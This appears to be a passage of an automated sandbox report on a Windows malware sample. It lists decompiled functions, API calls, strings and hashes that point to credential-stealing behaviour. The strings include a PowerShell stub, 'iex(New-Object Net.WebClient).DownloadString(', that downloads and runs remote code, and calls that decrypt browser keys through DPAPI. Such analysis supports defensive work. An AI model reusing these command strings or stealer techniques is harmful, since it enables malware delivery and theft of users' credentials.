Part of subcall function 008247D7: FindFirstFileA.KERNEL32(?,?), ref: 00824824

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
Instruction ID: b1f70f968a282c927eae9d6093052c4c838516f9361db190d4ffb5f0da573e46
Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
Instruction Fuzzy Hash: 7E3191B6940218ABCB14FBF4DC89EE9737CFB58700F404589B245D2081DEB097C9CB96

Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00412D85

Strings

<, xrefs: 00412D39
')", xrefs: 00412CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9

Function 00811487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008114A5
__aulldiv.LIBCMT ref: 008114BF
__aulldiv.LIBCMT ref: 008114CD
ExitProcess.KERNEL32 ref: 008114FB

Strings

@, xrefs: 0081149A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: 06ec757eed18a334d1919d818dbb755ee9c13b33b24f35edf585969ca26aea2f
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 4701E8B0941308EAEF109BD4D889B9DBA79FF40B05F208458E705B6280D6B49585875A

Function 0081A077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00820CC7: memset.MSVCRT ref: 00820E83
Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00000000), ref: 00820E9C
Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00000000), ref: 00820EC4
Part of subcall function 00820CC7: lstrcat.KERNEL32(?,00420D80), ref: 00820ED6

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

memcmp.MSVCRT(?,00421114,00000003), ref: 0081A116
memset.MSVCRT ref: 0081A14F
LocalAlloc.KERNEL32(00000040,?), ref: 0081A1A8

Strings

@, xrefs: 0081A158

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @
API String ID: 1977917189-2766056989
Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
Instruction ID: 98642f689f5bbc98da8b98f976be66256a11b10c5763e82f19088c15d248a593
Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
Instruction Fuzzy Hash: 87614930600258DBCF18EFA8DD96FED77B9FF44304F408118E90A9B691DB746A85CB42

Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410DB8
strtok_s.MSVCRT ref: 00410EFD

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95

Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3

Strings

"encrypted_key":", xrefs: 00409D30
DPAPI, xrefs: 00409D89
, xrefs: 00409DC1

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5

Function 0082CDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 0082CDD8
GetCPInfo.KERNEL32(?,?), ref: 0082CDEB
memset.MSVCRT ref: 0082CE03
setSBUpLow.LIBCMT ref: 0082CED9

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
Instruction ID: 76792bffc9634d0f0bd851dab10c0968207ee2dfb1301ea88c4df7d85f58b550
Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
Instruction Fuzzy Hash: E8312834A042B59ED7258F38EC9527DBFA0FF05314B1841BAD882CF192C778C885D762

Function 00826B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00826BD3
sscanf.NTDLL ref: 00826C00
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C19
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00826C27
ExitProcess.KERNEL32 ref: 00826C41

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
Instruction ID: 70a53459e7e362d899cda8d7d8eeeec3d6f3d07fef943e6b0fc048dc803ee927
Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
Instruction Fuzzy Hash: 9321E7B5D04219ABCF08EFE8E9459EEB7BAFF48300F04852EE406E3250EB345604CB65

Function 004187C0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
wsprintfA.USER32 ref: 00418850

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

%dx%d, xrefs: 00418847
Fs, xrefs: 00418804, 00418813

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: Fs$%dx%d
API String ID: 2716131235-1170756869
Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5

Function 00828067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082809E
RtlAllocateHeap.NTDLL(00000000), ref: 008280A5
RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 008280C5
RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 008280E6
RegCloseKey.ADVAPI32(?), ref: 008280F9

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction ID: 474f3e6314bfcf2c9ca175d31d4434e2de8317a88eb36ee71535ba7e4271e6c3
Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction Fuzzy Hash: 43113DB5A84219FBDB10CFD4ED4AFABB7B9FB05710F104119F615A7280CB7568018BA1

Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
HeapAlloc.KERNEL32(00000000), ref: 00417E3E
RegOpenKeyExA.ADVAPI32(80000002,00895E90,00000000,00020119,?), ref: 00417E5E
RegQueryValueExA.ADVAPI32(?,008C9C20,00000000,00000000,000000FF,000000FF), ref: 00417E7F
RegCloseKey.ADVAPI32(?), ref: 00417E92

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6

Function 00827987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0082799B
RtlAllocateHeap.NTDLL(00000000), ref: 008279A2
RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00827920), ref: 008279C2
RegQueryValueExA.ADVAPI32(00827920,00420AAC,00000000,00000000,?,000000FF), ref: 008279E1
RegCloseKey.ADVAPI32(00827920), ref: 008279EB

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction ID: 21930021dbdf45731cba6800dee5d36ec44e8c73524c58fb597957c36bd37f5d
Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction Fuzzy Hash: 9501F4B9A40308FFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281D67555408F51

Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(008C92B0,?,?,?,0041140C,?,008C92B0,00000000), ref: 0041926C
lstrcpyn.KERNEL32(0064AB88,008C92B0,008C92B0,?,0041140C,?,008C92B0), ref: 00419290
lstrlenA.KERNEL32(?,?,0041140C,?,008C92B0), ref: 004192A7
wsprintfA.USER32 ref: 004192C7

Strings

%s%s, xrefs: 004192B5

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95

Function 00811507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081151B
RtlAllocateHeap.NTDLL(00000000), ref: 00811522
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0081153E
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0081155C
RegCloseKey.ADVAPI32(?), ref: 00811566

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction ID: a6f52a24ee0a9c68a31dc6ef55aaffc41d7346dcfe37cebe33a6ef74c71d3db3
Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction Fuzzy Hash: A30131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51

Function 0082C9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0082C9B5

Part of subcall function 0082C206: __getptd_noexit.LIBCMT ref: 0082C209
Part of subcall function 0082C206: __amsg_exit.LIBCMT ref: 0082C216

__getptd.LIBCMT ref: 0082C9CC
__amsg_exit.LIBCMT ref: 0082C9DA
__lock.LIBCMT ref: 0082C9EA
__updatetlocinfoEx_nolock.LIBCMT ref: 0082C9FE

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
Instruction ID: bd4a05061a5bdcf5569229c429a318c2006324fd71cf545ad8e0a6255e14e696
Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
Instruction Fuzzy Hash: 4FF06D32A41734DBD620BBAC780372D37A0FF00764F50414AE814E61D2DB6459D09B9B

Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C74E

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__getptd.LIBCMT ref: 0041C765
__amsg_exit.LIBCMT ref: 0041C773
__lock.LIBCMT ref: 0041C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C797

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E

Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,008998B0), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,008998C0), ref: 00410866
StrCmpCA.SHLWAPI(00000000,00899890), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410A40, 00410A54, 00410803, 0041091B, 00410806, 0041091E, 00410A43

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86

Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

